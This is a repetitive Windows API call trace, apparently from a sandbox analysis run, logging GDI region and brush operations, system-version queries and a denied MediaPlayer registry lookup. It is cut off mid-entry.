[0087.721] CreateSolidBrush (color=0xff0000) returned 0x1100a73 [0087.721] DeleteObject (ho=0x1100a73) returned 1 [0087.721] DeleteObject (ho=0x4b0401d3) returned 1 [0087.721] DeleteObject (ho=0x490401d6) returned 1 [0087.721] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.721] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.722] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.722] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.722] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.722] BeginPath (hdc=0x0) returned 0 [0087.722] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.722] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.722] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.722] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.722] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.722] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.722] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.722] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.722] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4c0401d3 [0087.722] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4a0401d6 [0087.722] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a74 [0087.722] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a75 [0087.722] CombineRgn (hrgnDst=0x1040a74, hrgnSrc1=0x4c0401d3, hrgnSrc2=0x4a0401d6, iMode=1) returned 1 [0087.722] CombineRgn (hrgnDst=0x1040a75, hrgnSrc1=0x4c0401d3, hrgnSrc2=0x4a0401d6, iMode=4) returned 2 [0087.722] CreateSolidBrush (color=0xff) returned 0x2100a73 [0087.722] CreateSolidBrush (color=0xff0000) returned 0x1100a76 [0087.722] DeleteObject (ho=0x1100a76) returned 1 [0087.722] DeleteObject (ho=0x4a0401d6) returned 1 [0087.722] DeleteObject (ho=0x4c0401d3) returned 1 [0087.722] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.722] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.722] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.722] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.722] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.722] BeginPath (hdc=0x0) returned 0 [0087.722] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.722] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.722] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.722] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.722] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.722] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.722] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.722] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.723] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4b0401d6 [0087.723] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4d0401d3 [0087.723] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a77 [0087.723] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a78 [0087.723] CombineRgn (hrgnDst=0x1040a77, hrgnSrc1=0x4b0401d6, hrgnSrc2=0x4d0401d3, iMode=1) returned 1 [0087.723] CombineRgn (hrgnDst=0x1040a78, hrgnSrc1=0x4b0401d6, hrgnSrc2=0x4d0401d3, iMode=4) returned 2 [0087.723] CreateSolidBrush (color=0xff) returned 0x2100a76 [0087.723] CreateSolidBrush (color=0xff0000) returned 0x1100a79 [0087.723] DeleteObject (ho=0x1100a79) returned 1 [0087.723] DeleteObject (ho=0x4d0401d3) returned 1 [0087.723] DeleteObject (ho=0x4b0401d6) returned 1 [0087.723] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.723] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.723] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.723] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.723] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.723] BeginPath (hdc=0x0) returned 0 [0087.723] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.723] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.723] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.723] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.723] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.723] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.723] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.723] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.723] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4e0401d3 [0087.723] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4c0401d6 [0087.723] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a7a [0087.723] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a7b [0087.723] CombineRgn (hrgnDst=0x1040a7a, hrgnSrc1=0x4e0401d3, hrgnSrc2=0x4c0401d6, iMode=1) returned 1 [0087.723] CombineRgn (hrgnDst=0x1040a7b, hrgnSrc1=0x4e0401d3, hrgnSrc2=0x4c0401d6, iMode=4) returned 2 [0087.723] CreateSolidBrush (color=0xff) returned 0x2100a79 [0087.723] CreateSolidBrush (color=0xff0000) returned 0x1100a7c [0087.723] DeleteObject (ho=0x1100a7c) returned 1 [0087.723] DeleteObject (ho=0x4c0401d6) returned 1 [0087.723] DeleteObject (ho=0x4e0401d3) returned 1 [0087.723] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.723] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.723] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.723] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.723] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.724] BeginPath (hdc=0x0) returned 0 [0087.724] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.724] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.724] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.724] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.724] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.724] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.724] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.724] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.724] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4d0401d6 [0087.724] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4f0401d3 [0087.724] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a7d [0087.724] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a7e [0087.724] CombineRgn (hrgnDst=0x1040a7d, hrgnSrc1=0x4d0401d6, hrgnSrc2=0x4f0401d3, iMode=1) returned 1 [0087.724] CombineRgn (hrgnDst=0x1040a7e, hrgnSrc1=0x4d0401d6, hrgnSrc2=0x4f0401d3, iMode=4) returned 2 [0087.724] CreateSolidBrush (color=0xff) returned 0x2100a7c [0087.724] CreateSolidBrush (color=0xff0000) returned 0x1100a7f [0087.724] DeleteObject (ho=0x1100a7f) returned 1 [0087.724] DeleteObject (ho=0x4f0401d3) returned 1 [0087.724] DeleteObject (ho=0x4d0401d6) returned 1 [0087.724] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.724] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.724] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.724] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.724] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.724] BeginPath (hdc=0x0) returned 0 [0087.724] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.724] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.724] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.724] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.724] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.724] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.724] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.724] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.724] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x500401d3 [0087.724] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4e0401d6 [0087.724] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a80 [0087.724] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a81 [0087.725] CombineRgn (hrgnDst=0x1040a80, hrgnSrc1=0x500401d3, hrgnSrc2=0x4e0401d6, iMode=1) returned 1 [0087.725] CombineRgn (hrgnDst=0x1040a81, hrgnSrc1=0x500401d3, hrgnSrc2=0x4e0401d6, iMode=4) returned 2 [0087.725] CreateSolidBrush (color=0xff) returned 0x2100a7f [0087.725] CreateSolidBrush (color=0xff0000) returned 0x1100a82 [0087.725] DeleteObject (ho=0x1100a82) returned 1 [0087.725] DeleteObject (ho=0x4e0401d6) returned 1 [0087.725] DeleteObject (ho=0x500401d3) returned 1 [0087.725] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.725] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.725] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.725] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.725] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.725] BeginPath (hdc=0x0) returned 0 [0087.725] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.725] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.725] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.725] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.725] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.725] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.725] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.725] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.725] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4f0401d6 [0087.725] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x510401d3 [0087.725] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a83 [0087.725] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a84 [0087.725] CombineRgn (hrgnDst=0x1040a83, hrgnSrc1=0x4f0401d6, hrgnSrc2=0x510401d3, iMode=1) returned 1 [0087.725] CombineRgn (hrgnDst=0x1040a84, hrgnSrc1=0x4f0401d6, hrgnSrc2=0x510401d3, iMode=4) returned 2 [0087.725] CreateSolidBrush (color=0xff) returned 0x2100a82 [0087.725] CreateSolidBrush (color=0xff0000) returned 0x1100a85 [0087.725] DeleteObject (ho=0x1100a85) returned 1 [0087.725] DeleteObject (ho=0x510401d3) returned 1 [0087.725] DeleteObject (ho=0x4f0401d6) returned 1 [0087.725] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.725] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.725] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.725] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.725] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.725] BeginPath (hdc=0x0) returned 0 [0087.725] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.725] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.725] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.725] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.725] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.725] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.726] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.726] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.726] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x520401d3 [0087.726] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x500401d6 [0087.726] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a86 [0087.726] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a87 [0087.726] CombineRgn (hrgnDst=0x1040a86, hrgnSrc1=0x520401d3, hrgnSrc2=0x500401d6, iMode=1) returned 1 [0087.726] CombineRgn (hrgnDst=0x1040a87, hrgnSrc1=0x520401d3, hrgnSrc2=0x500401d6, iMode=4) returned 2 [0087.726] CreateSolidBrush (color=0xff) returned 0x2100a85 [0087.726] CreateSolidBrush (color=0xff0000) returned 0x1100a88 [0087.726] DeleteObject (ho=0x1100a88) returned 1 [0087.726] DeleteObject (ho=0x500401d6) returned 1 [0087.726] DeleteObject (ho=0x520401d3) returned 1 [0087.726] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.726] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.726] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.726] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.726] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.726] BeginPath (hdc=0x0) returned 0 [0087.726] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.726] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.726] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.726] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.726] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.726] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.726] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.726] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.726] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x510401d6 [0087.726] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x530401d3 [0087.726] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a89 [0087.726] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a8a [0087.726] CombineRgn (hrgnDst=0x1040a89, hrgnSrc1=0x510401d6, hrgnSrc2=0x530401d3, iMode=1) returned 1 [0087.726] CombineRgn (hrgnDst=0x1040a8a, hrgnSrc1=0x510401d6, hrgnSrc2=0x530401d3, iMode=4) returned 2 [0087.726] CreateSolidBrush (color=0xff) returned 0x2100a88 [0087.726] CreateSolidBrush (color=0xff0000) returned 0x1100a8b [0087.727] DeleteObject (ho=0x1100a8b) returned 1 [0087.727] DeleteObject (ho=0x530401d3) returned 1 [0087.727] DeleteObject (ho=0x510401d6) returned 1 [0087.727] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.727] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.727] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.727] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.727] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.727] BeginPath (hdc=0x0) returned 0 [0087.727] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.727] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.727] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.727] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.727] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.727] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.727] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.760] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x540401d3 [0087.760] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x520401d6 [0087.760] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b25 [0087.760] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b26 [0087.760] CombineRgn (hrgnDst=0x1040b25, hrgnSrc1=0x540401d3, hrgnSrc2=0x520401d6, iMode=1) returned 1 [0087.760] CombineRgn (hrgnDst=0x1040b26, hrgnSrc1=0x540401d3, hrgnSrc2=0x520401d6, iMode=4) returned 2 [0087.760] CreateSolidBrush (color=0xff) returned 0x2100a8b [0087.760] CreateSolidBrush (color=0xff0000) returned 0x1100b27 [0087.760] DeleteObject (ho=0x1100b27) returned 1 [0087.760] DeleteObject (ho=0x520401d6) returned 1 [0087.760] DeleteObject (ho=0x540401d3) returned 1 [0087.760] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.760] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, 